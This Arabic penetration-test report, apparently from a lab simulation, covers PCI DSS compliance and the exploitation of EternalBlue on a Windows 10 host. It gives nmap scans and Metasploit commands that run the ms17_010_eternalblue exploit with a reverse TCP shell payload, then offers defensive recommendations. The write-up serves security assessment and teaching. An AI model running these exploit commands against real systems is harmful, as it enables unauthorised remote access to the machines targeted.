
يقدم هذا التقرير ملخصًا لاختبار اختراق وتقييم الثغرات (VAPT) منظم يركز على الامتثال لمعايير PCI DSS، واستكشاف خدمة SMB، واستغلال الثغرة CVE-2017-0144 (EternalBlue) على جهاز يعمل بنظام Windows 10 ضمن بنية تحتية مالية.
تواجه المؤسسات المالية بعضًا من أكثر متطلبات الامتثال صرامة في مجال الأمن السيبراني. مع وجود بيانات العملاء الحساسة ومعلومات حامل البطاقة على المحك، يمكن أن تؤدي التكوينات الأمنية الخاطئة إلى اختراقات كارثية. تم إجراء محاكاة اختبار الاختراق وتقييم الثغرات (VAPT) هذه لتقييم الوضع الأمني لنظام نقطة نهاية يعمل بنظام ويندوز 10 من منظور الامتثال لمعيار PCI DSS، مع تحديد واستغلال الثغرات المعروفة في خدمات SMB المكشوفة.
تغطي المحاكاة مراحل متعددة - بدءًا من الاستطلاع ومسح الثغرات باستخدام Nessus إلى الاستغلال الواقعي عبر Metasploit. يؤكد التقرير أيضًا على أهمية تقوية نقاط النهاية، وإدارة التصحيحات، وفرض جدار الحماية، والمواءمة مع PCI DSS في الحفاظ على سلامة الشبكات المالية.
أعد بواسطة: أديتيا بهات
المسمى الوظيفي: محلل VAPT | محترف أمن سيبراني
جهة الاتصال: [email protected] | +91-9818993884
يعرض هذا التقرير نتائج اختبار الاختراق الذي تم إجراؤه على نقطة نهاية ويندوز 10 يُشتبه في أنها تتعامل مع البيانات المالية ومعاملات بطاقات الائتمان. كان الهدف هو التحقق من صحة تطبيقات ضوابط PCI DSS وتحديد نواقل الهجوم المحتملة التي قد تؤثر على بيانات حامل البطاقة.
باستخدام Nessus، تم اكتشاف أن المضيف معرض لثغرة CVE-2017-0144 (EternalBlue) - وهي ثغرة حرجة في SMB. تم بعد ذلك استخدام إطار Metasploit لاستغلال هذا العطل والحصول على وصول غير مصرح به لشل عن بعد. يسلط هذا التقرير الضوء على أهمية إدارة التصحيحات في الوقت المناسب وتقوية خدمات الشبكة لتجنب اختراقات البيانات في الأنظمة المالية.
تم مراجعة ستة أهداف رئيسية واثني عشر متطلبًا من PCI DSS. تشمل المبادئ الرئيسية:
النظام المستهدف:
10.10.195.105255.0.0.0الأدوات المستخدمة:
الأوامر الرئيسية:
nmap -sn 10.10.195.105
nmap -sV -p445 10.10.195.105
nmap -F 10.10.195.105
الماسح الضوئي:
محاولة فحص Nessus:
محاولة فحص Metasploit:
use scanner/smb/smb_ms17_010
set RHOSTS 10.10.195.105
run
وحدة الاستغلال:
use exploit/windows/smb/ms17_010_eternalblue
set payload generic/shell_reverse_tcp
set RHOSTS 10.10.195.105
set LHOST 10.17.88.138
exploit
إدارة التصحيحات
تقوية الشبكة
فرض جدار الحماية
المراقبة المستمرة
الامتثال لـ PCI DSS
التدريب التوعوي
أظهرت هذه المهمة بوضوح أن الخدمات غير المصححة والقديمة مثل SMBv1 يمكن أن تؤدي إلى اختراق كامل للنظام باستخدام استغلالات معروفة للعامة. ثغرة EternalBlue التي تم استغلالها هنا هي مثال كلاسيكي على لماذا تعتبر التصحيحات في الوقت المناسب، وتقليل الخدمات، والفحص الاستباقي غير قابلة للتفاوض في البنية التحتية المالية.
بدون الامتثال لأطر عمل مثل PCI DSS، تخاطر المؤسسات بغرامات قانونية واختراقات بيانات مدمرة.
غالبًا ما تختبئ الفجوات الأمنية خلف البروتوكولات القديمة والتصحيحات المنسية. أكدت هذه المهمة مجددًا على أهمية التعامل مع كل خدمة - خاصة تلك مثل SMB - ليس كسهولة، ولكن كسطح خطر.
يبدأ الأمن السيبراني القوي في القطاع المالي باليقظة المستمرة، والسياسات المفروضة، وإدارة التصحيحات غير القابلة للتنازل.
شكرًا لقراءة هذا التقرير. آمل أنه قدم وضوحًا ورؤية عملية وتأكيدًا على لماذا التحقق الأمني المستمر ضروري - خاصة عند التعامل مع البيانات المالية.
– أديتيا بهات
محلل VAPT | محترف أمن سيبراني
| وصف المخاطرة | التأثير | الاحتمالية | درجة المخاطرة |
|---|
| استغلال ثغرة EternalBlue (SMBv1) | عالي | عالي | حرج |
| عدم وجود إدارة تصحيحات | عالي | متوسط | عالي |
| غياب ضوابط الوصول إلى الشبكة | متوسط | عالي | عالي |
| عدم الامتثال لـ PCI DSS | عالي | عالي | حرج |